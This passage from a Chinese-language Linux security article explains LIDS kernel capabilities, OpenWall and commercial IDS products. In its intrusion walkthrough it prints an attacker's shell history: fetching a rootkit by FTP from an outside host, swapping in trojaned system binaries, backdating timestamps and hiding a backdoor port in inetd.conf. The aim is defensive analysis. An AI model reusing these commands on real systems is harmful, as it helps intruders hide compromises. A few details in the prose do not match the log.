快速的瀏覽LIDS的文檔就可以了解LIDS的一系列特性。而我認為下面的這些特性是最重要的：

　　CAP_LINUX_IMMUTABLE 當文件和外那間系統被標識"immutable"防止被寫； CAP_NET_ADMIN 防止篡改網絡配置（例如：防止路由表被修改）；

　　CAP_SYS_MODULE 防止內核模塊被插入或者移除；CAP_SYS_RAWIO 防止損壞磁盤或者設備I/O；

　　CAP_SYS_ADMIN 防止大范圍的使用其他系統功能；

　　INIT_CHILDREN_LOCK which prevents child processes of the init() master process from being tampered with.

　　無論在哪個點，上面這些特性都能夠通過命令"lidsadm -I"來啟動，通過"lidsadm -S"來禁用（可以允許真正的系統管理員來進行系統配置），同時提供已經安裝在內核中的LIDS口令（是通過RipeMD-160加密的）。

　　剖析一次入侵

　　當黑客把一些系統守護進程的緩沖區溢出以后就可以獲得root權限，這個時候就是主機被入侵了（事實上是不可能發生的，但是安裝Linux系統的人忘記了打上RedHat最新的關于緩沖區溢出的補丁程序，并且讓系統一直運行著）。當然一些黑客也不夠小心，當他們侵入主機后，很急切的獲得了shell，但是他們經常沒有考慮到BASH的命令將會被存入系統日志文件中，簡單的閱讀/.bash_history就可以了解黑客到底怎么機器上面作了一些什么事情。這個文件我們可以看看（為了更加簡單我們做過一些細微的修改）： mkdir /usr/lib/... ; cd /usr/lib/...ftp 200.192.58.201 21

　　cd /usr/lib/...
　　mv netstat.gz? netstat.gz; mv ps.gz? ps.gz; mv pstree.gz? pstree.gz;
　　mv pt07.gz? pt07.gz; mv slice2.gz? slice2.gz; mv syslogd.gz? syslogd.gz;
　　mv tcpd.gz? tcpd.gz
　　gzip -d *
　　chmod +x *
　　mv netstat /bin ; mv ps /bin ; mv tcpd /usr/sbin/; mv syslogd /usr/sbin;
　　mv pt07 /usr/lib/; mv pstree /usr/bin ;
　　/usr/lib/pt07
　　touch -t 199910122110 /usr/lib/pt07
　　touch -t 199910122110 /usr/sbin/syslogd
　　touch -t 199910122110 /usr/sbin/tcpd
　　touch -t 199910122110 /bin/ps
　　touch -t 199910122110 /bin/netstat
　　touch -t 199910122110 /usr/bin/pstree
　　cat /etc/inetd.conf | grep -v 15678 >> /tmp/b
　　mv /tmp/b /etc/inetd.conf
　　killall -HUP inetd

　　通讀這些內容，我們就可以了解下面的一些動作：

　　系統中建立了一個名字異常的目錄（/usr/lib），接著黑客telnet到了自己的主機上面（200.192.58.201，是Brazil某個地方的撥號用戶），同時下載了一套黑客工具。這些黑客工具尸沒有經過壓縮的，中間的一些特洛伊二進制程序被安裝到了系統中了，這些特洛伊程序覆蓋了系統的netstat，ps， tcpd， syslogd和pstree命令。這些程序是用來報告系統有那些進程正在運行，那些端口是打開的。

　　我們從中能學到什么呢？

　　首先，LIDS是不能阻止一次入侵的，黑客連接上主機通過緩沖區溢出的方式獲得系統的root權限。一旦系統沒有黑客入侵，我們看看LIDS是如何使破壞降到最低的。

　　LIDS通過CAP_LINUX_IMMUTABLE選項可以防止特洛尹程序被寫入到/bin，/usr/bin，/usr/sbin和/usr/lib目錄中。這些目錄我們一般都會標識為不可變的（chattr +i），因而也不會被修改。我們可以注意到，就算不使用LIDS，也可以通過chattr +I命令來標識目錄為不可變的，但是如果是通過LIDS以后，即使是root也不能篡改不可變標識位。類似的，如果文件通過chattr +I被標識為，touck -t這個命令也會失敗。甚至第一行的"mkdir /etc/lib"這個命令也會失敗，如果我們標識文件為不可讀的話。

　　LIDS不能防止黑客入侵，但是可以防止入侵的黑客在侵入后進行很大的系統破壞。一個后門程序可以被安裝上系統，但是沒有特洛亦版本的ps，netstat和pstree能夠很早的發現這個后門進程，然后kill之。如果沒有LIDS，我們不可能知道黑客通過這個后門程序會做一些什么事情，我們唯一能夠進行挽回的工作就是重裝系統。

　　OpenWall和LIDS----額外的層

　　另外一個和LIDS相似的系統是OpenWall工程。OpenWall工程在很多地方和LIDS不一樣，有一個OpenWall的特別的補丁就是使棧區為不可執行。下面是摘自OpenWall的README文檔里面的申明：

　　大多數緩沖區溢出攻擊都是基于覆蓋一些隨意的程序片段中的函數返回值在堆棧中的地址，如果堆棧為不可執行，那么緩沖區溢出的弱點將會變得很難攻擊。另外一種緩沖區溢出的方式是在libc中指出一個函數的返回地址，通常是system()。這個補丁通過修改mmap()化的共享庫，使其總是一個零字節的文件。這樣使其不能再指定一些數據，在很多攻擊中不得不使用ASCIIZ字符串。

　　最近，在LIDS的網上上有一些完整的LIDS＋OpenWall的內核補丁，這樣可以提供LIDS和OpenWall都具備的特性。

　　在Linux系統中，通過使用這一系列的多層的安全措施，可以防止很大范圍的攻擊，同時還可以防止入侵或者篡改。系統被黑客入侵口就是網絡接口，在網絡接口，系統內核上我們都可以防止他人的入侵。意識到系統中的一些潛在的安全漏洞。任何運行在系統上的守護進程或者服務，不管是root用戶還是非root用戶運行的，都能夠成為一個潛在的安全威脅。充分準備好面對這些威脅。

　　入侵監測系統軟件

　　突出的IDS廠商包括Axent，ISS和Platinum Technology。在你選擇產品時，請充分考慮哪一款產品更適合你的公司。有些產品具有優秀的圖形界面，很容易使用。其它產品可能更具有擴展性。下列是部分廠商列表：

　　·Axent Intruder Alert(http://www.axent.com/)Cisco NetRanger(http://www.cisco.com/)
　　·ISS RealSecure(http://www.iss.net/)
　　·Computer Associates’ eTrust Intrusion Detection(formerly SessionWall 3)
　　·Computer Misuse Detection System(http://www.cmds.net/)
　　·Network Flight Recorder(http://www.nfr.com)
　　·Network Associates’ CyberCop Monitor(http://www.networkassociates.com)

　　Intruder Alert

　　Intruder Alert(ITA)是使用管理者/代理結構的功能強大的產品。管理者和代理可以運行于UNIX，NT和Novell網絡中。ITA的第一個優點是它可以在許多網絡環境中應用。由于公司很少只應用單一廠商的產品，所以你選擇的IDS應該可以適用于盡可能多的廠商的產品。

　　ITA的第二個優點是其分布式的管理結構。ITA軟件包由兩個服務和三個應用程序組成：

　　·ITA Manager（充當服務，守護進程或Novell的可裝載的模塊）
　　·ITA Agent（充當服務，守護進程或Novell的可裝載的模塊）
　　·ITA Admin（用來配置代理的應用程序）
　　·ITA View（用于查詢代理的程序）
　　·ITA Setup（從管理者域中添加和刪除代理的程序）